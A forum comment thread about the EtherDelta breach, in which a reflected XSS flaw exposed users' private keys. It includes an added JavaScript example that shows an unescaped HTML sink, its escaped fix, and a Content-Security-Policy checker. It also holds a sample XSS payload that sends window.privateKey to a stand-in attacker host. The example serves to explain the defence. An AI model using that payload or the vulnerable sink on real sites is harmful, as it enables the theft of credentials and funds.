>Thus, users of EtherDelta must enter their public wallet address and private key when using the site, meaning their private key could be captured from the browser session by a malicious code injection.<p>This isn't some sort of fancy cryptocontract-based attack. The private key is just stored as a JavaScript object in the session, and an attacker found and exploited a reflected XSS vulnerability to send off the key.<p>Even if you're not sending your private key to the server directly, surely some people must have made these users aware of the risks they were taking? Not only XSS risks, but risks of a rogue admin or backend compromise injecting malicious JS.
I'm surprised and disappointed that EtherDelta doesn't use Content-Security-Policy headers. They pretty much solve XSS.<p>Google has a good introduction to using them here: <a href="https://csp.withgoogle.com/" rel="nofollow">https://csp.withgoogle.com/</a>
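To make the two comments above concrete (a reflected XSS sink that lets injected markup reach a key held in a page-global JS object, and what a Content-Security-Policy header does about it), here is an added example. It is not EtherDelta's code and not from the linked article; the function names, the attacker host `attacker.example`, the `window.privateKey` property and the payload are assumptions made for illustration, and the CSP check implements only the subset of the spec it comments on.

```javascript
// Added example, not the site's own code. Shows a reflected-XSS sink and its
// escaped counterpart, a constructed exfiltration payload, and a check for
// whether a given Content-Security-Policy would still let that inline
// script run. Names, the attacker domain and window.privateKey are assumed.

// Minimal HTML escaping for text nodes and quoted attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the URL parameter is interpolated into the page verbatim,
// so markup supplied in ?q= becomes markup in the response (reflected XSS).
function renderSearchPageUnsafe(q) {
  return `<html><body><p>Results for: ${q}</p></body></html>`;
}

// Hardened: the same page with the parameter encoded as text.
function renderSearchPageSafe(q) {
  return `<html><body><p>Results for: ${escapeHtml(q)}</p></body></html>`;
}

// Constructed payload of the shape that works against a page keeping a key
// in a global JS object: an inline event handler reads the key and sends it
// to an attacker-controlled host (hypothetical domain).
const XSS_PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?k=\'+' +
  'encodeURIComponent(window.privateKey))">';

// A strict policy: scripts only via a per-response nonce, no inline
// handlers, no eval, no plugins, no <base> hijacking.
function strictCspHeader(nonce) {
  return `default-src 'self'; script-src 'nonce-${nonce}' 'strict-dynamic'; ` +
         `object-src 'none'; base-uri 'none'`;
}

// Returns true if the policy would let an injected inline script or inline
// event handler execute. Rules applied: script-src falls back to default-src;
// with neither present, inline is allowed; 'unsafe-inline' allows it unless a
// nonce or hash source is also listed, in which case browsers ignore it.
function cspAllowsInlineScript(policy) {
  const directives = {};
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  const sources = directives['script-src'] || directives['default-src'];
  if (!sources) return true;
  const hasNonceOrHash = sources.some(s => /^'(nonce-|sha(256|384|512)-)/.test(s));
  return sources.includes("'unsafe-inline'") && !hasNonceOrHash;
}
```

Escaping stops the payload from being parsed as markup at all; the CSP is the second layer that stops an inline handler from executing even where some other sink is missed. Note that a policy which lists `'unsafe-inline'` without a nonce or hash gives no protection against exactly this class of injection.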
> I want to make one point clear: I believe that EtherDelta, in concept, is safer and more “trustworthy” than a traditional exchange. Everything about how EtherDelta functions is transparent and verifiable by users.... The attack detailed in this piece could have been identified by anyone before it was exploited, and if there had been a security review protocol in place, it would have been easily prevented.<p>Even "in concept", releasing fintech software without doing the security basics verges on professional misconduct.
I read the headline and my immediate guess was cryptocurrency. I clicked and, sure enough, there it was.<p>Maybe it's time to refine some of these ideas? While regular money does get stolen, maybe storing it online isn't the best method? Maybe requiring some human interaction is a good idea?<p>At this point, I can't really justify investing in any cryptocurrency. I'm absolutely unable to justify investing in any ICO.<p>If I opened a contract and my PayPal balance disappeared, I'd be pretty angry and might have some recourse. I'd absolutely have some options if it were with my credit/debit card or directly through my bank.<p>Good luck, folks. I'm still going to maintain the wait-and-see approach.